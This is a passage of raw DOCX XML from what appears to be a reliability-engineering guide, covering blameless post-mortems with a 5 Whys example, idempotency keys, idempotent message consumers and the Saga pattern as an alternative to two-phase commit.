          <w:bCs/>
        </w:rPr>
        <w:t>Post-Mortems — Learning from Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3C9C29" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>blameless post-mortem</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> is the reliability engineering process for extracting maximum learning value from failures. The "blameless" part is critical — if engineers fear punishment for failures, they hide information, and the organization never learns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023FD718" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The post-mortem structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662B737B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Timeline:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Chronological reconstruction of every relevant event — when the failure started, when it was detected, when each action was taken, when each hypothesis was tested, when the mitigation was applied. Built from logs, metrics, chat history, and team members' recollections. The timeline reveals </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>where time was lost</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — detection lag, investigation confusion, execution errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFA25A1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Root cause analysis (5 Whys):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Ask "why" repeatedly until reaching the systemic root cause:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36826A34" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Why did users see errors? → The payment service returned 500s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44312921" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Why did the payment service return 500s? → It couldn't connect to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D03A178" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Why couldn't it connect to the database? → The database primary had failed and failover hadn't completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F564132" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Why hadn't failover completed? → The failover script had a bug that prevented it from running when the disk was &gt;90% full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B101BBE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Why was the disk &gt;90% full? → Log rotation was misconfigured after the last infrastructure migration 3 months ago.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2405162D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The root cause is </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>log rotation misconfiguration</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — not the disk being full, not the failover script bug, not the database failure. Each "why" level reveals a deeper systemic issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72308121" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Contributing factors:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Usually multiple factors combine to cause a failure. No single cause is "the" root cause — it's a constellation of weaknesses that aligned:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D6C573" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="389"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>No alert for disk &gt;80% full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F61AD5C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="389"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Failover script not tested after infrastructure migration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7144816E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="389"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>No automated verification that failover scripts work post-deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C263F16" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="389"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>On-call engineer unfamiliar with failover procedure (runbook not updated).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124F1F03" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Action items:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Each contributing factor generates action items. Not "be more careful" (unactionable) — specific, measurable improvements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00657ED9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>"Add alert for disk &gt;80% on all database instances with 1-hour resolution time."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C00C9E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>"Add failover script smoke test to CI/CD pipeline."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B0F5AB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>"Update runbook with current failover procedure."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD9B68" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>"Schedule GameDay to test complete database failover end-to-end."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCFA90B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each action item has an owner and a deadline. Post-mortems without follow-through are theater, not reliability engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C94D0AE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="4EF3F22A">
          <v:rect id="_x0000_i2791" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04167A35" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Reliability at the Architecture Level — Design Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5AF24E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idempotency — The Reliability Foundation for Distributed Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550E9D3C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>An </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> operation produces the same result regardless of how many times it's executed. This is critical for reliability because in distributed systems, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>at-least-once delivery is the norm</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — messages may be delivered multiple times due to retries, network duplicates, or consumer restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB2ED3A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Without idempotency, retries cause duplicate effects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67438928" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>User clicks "Pay" twice (double-click, network delay causes second click) → charged twice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F1C17D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Payment service retries a failed RPC → payment processed twice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699898D9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Message queue delivers a message twice (at-least-once semantics) → order created twice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2C9EC4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idempotency key pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D38831" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client generates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unique idempotency key</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (UUID) for each operation. Sends it with the request. The server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1C821D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Checks if the idempotency key has been seen before (stored in Redis or database with TTL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B862DB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If seen: return the stored result of the original operation — </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do not re-execute</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB560F9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If not seen: execute the operation, store the result with the idempotency key, return the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B55FC23" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The idempotency key store must be </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>durable</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (Redis with AOF persistence, or a database) and must be checked </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atomically</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> with the operation execution (or use optimistic locking to prevent TOCTOU races where two parallel requests with the same key both pass the check before either executes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB68FBA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Natural idempotency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Some operations are naturally idempotent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B49136" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Setting a value (SET user.status = 'active' executed multiple times → same result).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043398C4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>DELETE by ID (deleting an already-deleted record → same result: record doesn't exist).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A784A01" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>HTTP PUT (replacing a resource with specified content → same content regardless of repetitions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BBE80D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Non-idempotent operations require explicit idempotency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC1EC79" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Incrementing a counter (balance += 100 executed twice → balance += 200).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C99CF2C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Inserting a record (inserting twice → duplicate records, or unique constraint violation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ADB66F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Sending a notification (sending twice → user receives two notifications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3C85F0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idempotent consumer pattern for message queues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEAF1D9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When a Kafka consumer processes a message and commits the message to a downstream system before committing the offset, a crash between the downstream commit and offset commit causes the message to be reprocessed. Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264CEB60" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Transactional outbox:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Write the message result and the offset commit in the same database transaction. Atomically either both succeed or neither does. Eliminates duplicate processing at the cost of requiring a database transaction per message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEE77AC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Idempotency key in message:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Include a unique message ID in each Kafka message. Consumer stores processed message IDs in a set (Redis, database). Before processing, check if the ID has been processed. Skip if yes. This is the message queue equivalent of the idempotency key pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A71EB5C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Saga Pattern — Distributed Transactions Without 2PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5EF539" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Two-phase commit (2PC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> provides distributed transaction atomicity but is reliability-hostile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F26C84" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The coordinator is a single point of failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739D180" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Participants are locked (holding locks on resources) from Phase 1 until Phase 2 completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00271BA2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If the coordinator fails after Phase 1, participants are in </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>blocking state indefinitely</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — holding locks, waiting for Phase 2 that never comes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775BBA57" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Slow participants block all other participants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1508870F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Saga pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> replaces 2PC with a sequence of </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>, each with a corresponding </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>compensating transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> for rollback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0331F816" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0708DC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Order Saga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEBA17D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  T1: Reserve inventory           ← C1: Release inventory reservation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F006A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  T2: Charge payment              ← C2: Refund payment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DFD1B4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  T3: Create shipping record      ← C3: Cancel shipping record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7CAF25" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  T4: Send confirmation email     (no compensation — email already sent, acceptable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56580697" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>If T3 fails: execute C2 (refund), then C1 (release inventory). The system is back to its pre-saga state, without any 2PC coordinator or blocking locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A01BB48" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Two Saga orchestration styles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7A6642" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Choreography:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Each service publishes events when it completes its local transaction. Other services react to these events and execute their local transactions. No central coordinator. Highly decoupled. Difficult to visualize and debug — the saga's overall progress is implicit in the event stream.</w:t>
      </w:r>
    </w:p>
